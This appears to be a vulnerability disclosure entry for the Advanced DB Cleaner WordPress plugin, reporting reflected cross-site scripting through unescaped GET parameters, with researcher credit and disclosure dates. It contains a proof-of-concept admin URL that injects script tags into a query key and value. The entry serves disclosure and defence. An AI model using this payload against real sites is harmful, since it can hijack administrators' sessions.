The plugin does not sanitise and escape $_GET keys and values before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
https://example.com/wp-admin/admin.php?page=advanced_db_cleaner&aDBc_tab=options&aDBc_cat=all&'><script>alert(/XSS-key/)</script>=<script>alert(/XSS-value/)</script>
ZhongFu Su(JrXnm) of Wuhan University
ZhongFu Su(JrXnm) of Wuhan University
Yes
2022-01-24 (about 1 years ago)
2022-01-24 (about 1 years ago)
2022-09-26 (about 8 months ago)